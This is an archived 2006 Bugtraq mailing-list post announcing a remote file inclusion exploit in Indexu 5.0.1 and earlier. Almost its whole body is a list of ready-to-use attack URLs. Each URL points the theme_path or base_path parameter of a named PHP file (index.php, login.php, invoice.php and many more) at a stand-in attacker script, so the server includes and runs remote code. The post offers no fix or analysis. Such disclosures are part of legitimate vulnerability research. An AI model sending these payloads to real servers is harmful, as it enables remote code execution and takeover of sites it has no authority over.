INDEXU <= 5.0.1 (theme_path)and (base_path) Remote File Inclusion Exploit

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: INDEXU <= 5.0.1 (theme_path)and (base_path) Remote File Inclusion Exploit
From: selfar2002@xxxxxxxxxxx
Date: 11 Apr 2006 01:12:20 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Application : Indexu
version     : 5.0.0 5.0.1
URL         : http://www.nicecoder.com/



Vulnerable:# INDEXU <= 5.0.1 (theme_path)and (base_path) Remote File Inclusion 
Exploit

Discovery by SnIpEr_SA

in (theme_path)
this file :
exploit:
http://example.com/indexu/index.php?theme_path=http://evil.txt?cmd

http://example.com/indexu/become_editor.php?theme_path=http://evil.txt?cmd

http://example.com/indexu/add.php?theme_path=http://evil.txt?cmd

http://example.com/indexu/bad_link.php?theme_path=http://evil.txt

http://example.com/indexu/browse.php?theme_path=http://evil.txt?cmd

http://example.com/indexu/detail.php?theme_path=http://evil.txt?cmd

http://example.com/indexu/fav.php?theme_path=http://evil.txt?cmd

http://example.com/indexu/get_rated.php?theme_path=http://evil.txt?cmd

http://example.com/indexu/login.php?theme_path=http://evil.txt?cmd

http://example.com/indexu/mailing_list.php?theme_path=http://evil.txt?cmd

http://example.com/indexu/new.php?theme_path=http://evil.txt?cmd

http://example.com/indexu/modify.php?theme_path=http://evil.txt?cmd

http://example.com/indexu/pick.php?theme_path=http://evil.txt?cmd

http://example.com/indexu/power_search.php?theme_path=http://evil.txt?cmd

http://example.com/indexu/rating.php?theme_path=http://evil.txt?cmd

http://example.com/indexu/rating.php?theme_path=http://evil.txt?cmd?cmd

http://example.com/indexu/register.php?theme_path=http://evil.txt?cmd?cmd

http://example.com/indexu/review.php?theme_path=http://evil.txt?cmd?cmd

http://example.com/indexu/rss.php?theme_path=http://evil.txt?cmd?cmd

http://example.com/indexu/search.php?theme_path=http://evil.txt?cmd?cmd

http://example.com/indexu/send_pwd.php?theme_path=http://evil.txt?cmd?cmd

http://example.com/indexu/sendmail.php?theme_path=http://evil.txt?cmd?cmd

http://example.com/indexu/tell_friend.php?theme_path=http://evil.txt?cmd?cmd

http://example.com/indexu/top_rated.php?theme_path=http://evil.txt?cmd?cmd

http://example.com/indexu/user_detail.php?theme_path=http://evil.txt?cmd?cmd

http://example.com/indexu/user_search.php?theme_path=http://evil.txt?cmd?cmd

--------------------------- 

in (base_path)

in this file:

invoice.php

expliot:

http://example.com/indexu/invoice.php?base_path=http://evil.txt?cmd?cmd

-------------------


www.3asfh.com

www.lezr.com

<<<<
Discovered By SnIpEr_SA

Prev by Date: Confixx 3.1.2 <= Cross Site Scripting Vuln
Next by Date: [ MDKSA-2006:069 ] - Updated openvpn packages fix vulnerability
Previous by thread: Confixx 3.1.2 <= Cross Site Scripting Vuln
Next by thread: [ MDKSA-2006:069 ] - Updated openvpn packages fix vulnerability
Index(es):
- Date
- Thread